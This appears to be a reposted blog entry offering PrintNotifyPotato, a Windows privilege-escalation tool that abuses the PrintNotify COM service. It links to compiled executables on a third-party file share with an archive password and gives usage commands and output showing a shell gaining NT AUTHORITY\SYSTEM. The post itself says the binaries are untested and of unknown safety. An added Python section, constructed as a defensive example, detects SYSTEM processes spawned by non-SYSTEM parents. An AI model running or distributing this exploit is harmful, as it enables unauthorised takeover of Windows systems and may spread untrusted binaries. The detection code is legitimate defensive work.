Introduction to PrintNotifyPotato
Another potato: it uses the PrintNotify COM service for privilege escalation.
Applies to
Windows 10 – 11
Windows Server 2012 – 2022
PrintNotifyPotato download
- PrintNotifyPotato-NET2.exe 22 KB
- PrintNotifyPotato-NET35.exe 22 KB
- PrintNotifyPotato-NET46.exe 22.5 KB
Yunzhongzhuan (cloud relay) download link:
yunzhongzhuan.com/#sharefile=vjJOpwil_112919
Archive password: www.ddosi.org
Usage:
C:\Windows\Temp >PrintNotifyPotato.exe
Github: https://github.com/BeichenDream/PrintNotifyPotato
Example:
PrintNotifyPotato.exe whoami
PrintNotifyPotato.exe cmd interactive
C:\Windows\Temp >PrintNotifyPotato.exe whoami
[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x3d4
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x1016
[*] process start with pid 7272
nt authority\system
C:\Windows\Temp >
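A detection view of the session above, as an added example that is not part of the original post or of the PrintNotifyPotato project: it flags process creations where the child runs as NT AUTHORITY\SYSTEM but the parent does not. Assumptions: telemetry with Sysmon Event ID 1 style fields (User, ParentUser, ParentImage), the spawned process being logged with the tool's process as its parent, and constructed sample events (the service account and PID 5120 are invented; PID 7272, whoami and C:\Windows\Temp come from the output above).

```python
# Added example: constructed events, field names modelled on Sysmon Event ID 1.
SYSTEM = "NT AUTHORITY\\SYSTEM"
# Directories writable by low-privileged accounts (assumed list, tune per host).
WRITABLE_DIRS = ("c:\\windows\\temp\\", "c:\\users\\public\\", "c:\\programdata\\")

EVENTS = [  # constructed sample data, not captured from a real host
    {"ProcessId": 612, "Image": r"C:\Windows\System32\svchost.exe", "User": SYSTEM,
     "ParentImage": r"C:\Windows\System32\services.exe", "ParentUser": SYSTEM},
    {"ProcessId": 5120, "Image": r"C:\Windows\Temp\PrintNotifyPotato.exe",
     "User": r"IIS APPPOOL\DefaultAppPool",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentUser": r"IIS APPPOOL\DefaultAppPool"},
    {"ProcessId": 7272, "Image": r"C:\Windows\System32\whoami.exe", "User": SYSTEM,
     "ParentImage": r"C:\Windows\Temp\PrintNotifyPotato.exe",
     "ParentUser": r"IIS APPPOOL\DefaultAppPool"},
    {"ProcessId": 8800, "Image": r"C:\Windows\System32\notepad.exe",
     "User": r"CORP\alice",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentUser": r"CORP\alice"},
]

def score_event(ev):
    """Return the reasons a process creation looks like a jump to SYSTEM."""
    reasons = []
    user = ev.get("User", "").upper()
    parent_user = ev.get("ParentUser", "").upper()
    # A missing or "-" ParentUser means the field was not logged: no verdict.
    if user == SYSTEM and parent_user not in ("", "-", SYSTEM):
        reasons.append("SYSTEM child of non-SYSTEM parent (%s)" % ev["ParentUser"])
        if ev.get("ParentImage", "").lower().startswith(WRITABLE_DIRS):
            reasons.append("parent image in user-writable directory")
    return reasons

def find_token_jumps(events):
    """Map ProcessId -> reasons for every flagged event."""
    return {ev["ProcessId"]: r for ev in events if (r := score_event(ev))}

if __name__ == "__main__":
    for pid, reasons in find_token_jumps(EVENTS).items():
        print(pid, "; ".join(reasons))
```

Legitimate SYSTEM processes started by services.exe or a SYSTEM-owned svchost.exe pass through unflagged because their parent is already SYSTEM.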
Project URL:
github.com/BeichenDream/PrintNotifyPotato
References
code.google.com/p/google-security-research/issues/detail?id=128
zcgonvh
github.com/antonioCoco/JuicyPotatoNG
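Notes
The tool has not been tested and its safety is unknown; use your own judgment, or test it only inside a virtual machine.
This article is only a personal study record. The techniques involved are for learning and reference only and must not be used for anything else!!! Do not use the techniques mentioned in this article to illegally attack any computer system without authorization. The user alone is responsible for any direct or indirect consequences and losses caused by using the techniques provided in this article.
When reposting, please credit the source and include the link.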